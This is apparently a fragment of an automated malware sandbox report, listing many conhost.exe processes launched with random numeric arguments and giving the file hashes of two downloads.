C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1191051485-1773348911407172405-1344747937-985905225-11494696872859845441591286437"1⤵PID:1952
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-123093570-60813940-1697332606-681333603487733462914957282-2088466900-1037286538"1⤵PID:1440
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-921154106-720091683753717853250903989-135990973520604268051438927094502599918"1⤵PID:828
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "20827387101471227624232589441-1076523768-1327754003387447661217120212386260473"1⤵PID:2592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "26815810913770941425635215291981256110-12269489591829552651-849444406-2139695853"1⤵PID:1980
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1124452079-2009608570724815119185450281504312739-2048997704646283168118974901"1⤵PID:1896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-96740889862791429-840827190-142945950416536178201329862978-19268663741437467556"1⤵PID:3084
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1658501174-1281098443-16235380211331391629442103321-15696973015221807422011565312"1⤵PID:4020
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "12522510961502525923-17289612211062250239-616816509-1825400024-94105200210368605"1⤵PID:2536
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-821337301-1274757890-146063983631703360920264553462062414731-134215611317622104"1⤵PID:2792
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "574037754-12048956341090794366-797877416-16667646581794295948-2039264773-635255530"1⤵PID:3628
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1445525293200249493625899738-1109320262-164579277185570748716567142621994417411"1⤵PID:2376
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "7632757327196373194155662491496916698618105360-5441520131773809432-723474354"1⤵PID:3476
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "18084734491746266872448894143-318405071-3608069662878531836342233141003690960"1⤵PID:3820
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1992898312-42739817-6128123451867503686-1129920118812145561332001792-1017868837"1⤵PID:2744
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11626824252034873935-2087033799-3076639571455887013672774831-1374212096-594975493"1⤵PID:3468
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1711464820-2704923121671379640-791965811439331898-367124360-1477978960-1804430169"1⤵PID:3312
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1730837998-18911737253738619431472949870-15575898771115438372-1404223298-1335766392"1⤵PID:3800
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1334743380-1700503320-149565931316387137731672978518262730987201687322-1520753430"1⤵PID:112
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1160373803-16307171272025884569583565914-7978798542056588957-1621073018-1515759819"1⤵PID:1692
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-103131688671643654-1633632730671715816-920401805-2143473005-1932054625-2066703023"1⤵PID:2288
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13251202571129381090-170606855418829885741744671251-1716123763-820642575838224513"1⤵PID:2576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "712905884143120260972090201539350953615582125-12273603431406636565-783748736"1⤵PID:1052
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "6036340686097712220757399001435290576-906319418-296715897-95935234-1564235686"1⤵PID:3492
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "130503340405171902-479352380744725800-364930393201312487719703638451198645428"1⤵PID:2600
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "183517957-65293875-12368249391991802884-1631295088-89417277917136537371017874843"1⤵PID:3356
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-620642193-326870801-909233929-4248253451043999208-358383762851024058-1939480367"1⤵PID:2712
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21353157671981742534-355632395-16501151421919507652-1133291940-15001898881499661488"1⤵PID:2124
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-335831588-123719413019498698268215717673011720441078863375873955883-93357136"1⤵PID:3676
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "608944326-931450486-8384592711922096600-654352800433330494-749142553-679786240"1⤵PID:2612
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "464567328-932886244-208105996319873940921781937691118288015244157761802754278"1⤵PID:2508
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1648576497-377676699927022928-203168223615142486794808403011379965051852084575"1⤵PID:2156
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-463983955-417815248-469423826-4091513641906847302-1604685787-603587031183654770"1⤵PID:2216
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7bc80cac9b2c0201ac9139180278a0b7
SHA1677739c1bcf128782ee083c8b1079799d2969768
SHA256a8f40f4f6624ddddcb1f26c6eb89f370e3a53942aa5bdad82f971b9098a1f8b2
SHA51252590005e817ce0e195e671d532ee746fb3a6e595df5ea35c8326425e0312a1663302323d419fc3cb961503f8f3f15fa79d72bb4059a638f538bb8fe053bd447
-
MD5
4bd46537a7e353940769dd4011ffb280
SHA1ae4accf0c4b48f18c02738919bfe2bb58b8fe136
SHA256653d9054eb4b916c665f49dab9f0b00c263166e2fec21e4b66506643176fbf88
SHA512ab77fd604395da2d434476ed052791b769316f9ca5c7f7915b1813d40e4f9a712cbdef70ef12e22f5d2d657866e60f1eba5d2499d2397811c5358519bf089623